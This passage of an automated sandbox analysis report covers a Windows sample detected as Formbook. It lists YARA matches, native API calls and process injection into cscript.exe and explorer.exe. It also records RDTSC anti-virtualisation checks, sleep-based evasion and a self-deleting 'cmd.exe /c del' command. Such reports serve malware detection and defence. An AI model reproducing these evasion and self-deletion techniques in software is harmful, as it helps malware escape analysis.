          Source: Yara matchFile source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_00418222 NtCreateFile,
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_004183AA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047BB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047BAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047BA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047BA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047BA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02788280 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02788300 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_027883B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_027881D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02788222 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_027883AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_0040102E
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_0041B8FB
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_00408C6C
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_00408C70
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_0041B57A
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_00402D88
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_0041C58A
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_00402D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478841F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831002
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478B090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04770D20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04794120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04841D55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04796E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AEBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0278B8FB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02772FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02778C70
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02778C6C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0278B57A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02772D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0278C58A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02772D88
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0477B150 appears 32 times
          Source: 85vLO1Rpcy.exe, 00000001.00000003.655654489.000000000239F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 85vLO1Rpcy.exe
          Source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs 85vLO1Rpcy.exe
          Source: 85vLO1Rpcy.exe, 00000002.00000002.718870614.0000000000C0F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 85vLO1Rpcy.exe
          Source: 85vLO1Rpcy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@12/8
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_01
          Source: 85vLO1Rpcy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 85vLO1Rpcy.exeReversingLabs: Detection: 47%
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeFile read: C:\Users\user\Desktop\85vLO1Rpcy.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\85vLO1Rpcy.exe 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeProcess created: C:\Users\user\Desktop\85vLO1Rpcy.exe 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeProcess created: C:\Users\user\Desktop\85vLO1Rpcy.exe 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
          Source: Binary string: cscript.pdbUGP source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.706368480.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 85vLO1Rpcy.exe, 00000001.00000003.654242589.00000000020F0000.00000004.00000001.sdmp, 85vLO1Rpcy.exe, 00000002.00000002.718159413.0000000000960000.00000040.00000001.sdmp, cscript.exe, 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 85vLO1Rpcy.exe, cscript.exe
          Source: Binary string: cscript.pdb source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.706368480.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeUnpacked PE file: 2.2.85vLO1Rpcy.exe.400000.0.unpack .text:ER;.rdata:R; vs .text:ER;
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_004062F6 pushfd ; ret
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_004153FC push eax; retf
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_00415CE7 pushad ; ret
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_0041C4EE push 133511A3h; retf
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_00414D71 push ss; iretd
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_00415D38 pushad ; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_027762F6 pushfd ; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_027853FC push eax; retf
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0278B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0278B47C push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0278B41B push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0278B412 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0278C4EE push 133511A3h; retf
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02785CE7 pushad ; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02784D71 push ss; iretd
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02785D38 pushad ; ret
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000027785F4 second address: 00000000027785FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 000000000277898E second address: 0000000002778994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_004088C0 rdtsc
          Source: C:\Windows\explorer.exe TID: 4596Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6704Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
